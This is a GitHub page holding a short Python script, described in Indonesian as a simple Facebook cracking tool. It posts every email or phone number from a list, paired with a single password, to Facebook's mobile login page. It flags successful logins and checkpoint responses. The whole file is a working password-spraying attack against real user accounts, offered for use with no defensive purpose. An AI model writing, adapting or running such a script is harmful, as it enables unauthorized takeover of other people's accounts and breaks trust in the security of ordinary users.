-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathfbck.sh
35 lines (29 loc) · 921 Bytes
/
fbck.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import requests
import sys
import argparse
import os
parser = argparse.ArgumentParser(description="tools sederhana crack facebook")
parser.add_argument("-l", "--list",type=str, help="ID listor phone")
parser.add_argument("-p", "--password", type=str, help="Password to crack")
args = parser.parse_args()
jumlah = 0
def main():
global jumlah
id = args.list
pwd = args.password
url = "https://m.facebook.com/login.php"
list = open(id, "r").readlines()
for email in list:
email.split()
data = {"email":email, "pass":pwd}
r = requests.post(url, data=data).url
jumlah += 1
if "m_sess" in r or "save-device" in r:
print("[+] found : %s ~ %s"%(email,pwd))
if "checkpoint" in r:
print("[*] checkpoint %s ~ %s"%(email,pwd))
print("\r[~] crack akun %s|%s"%(jumlah,len(list))),;sys.stdout.flush()
if args.list == None or args.password == None:
os.system("python2 mbf.py -h")
else:
main()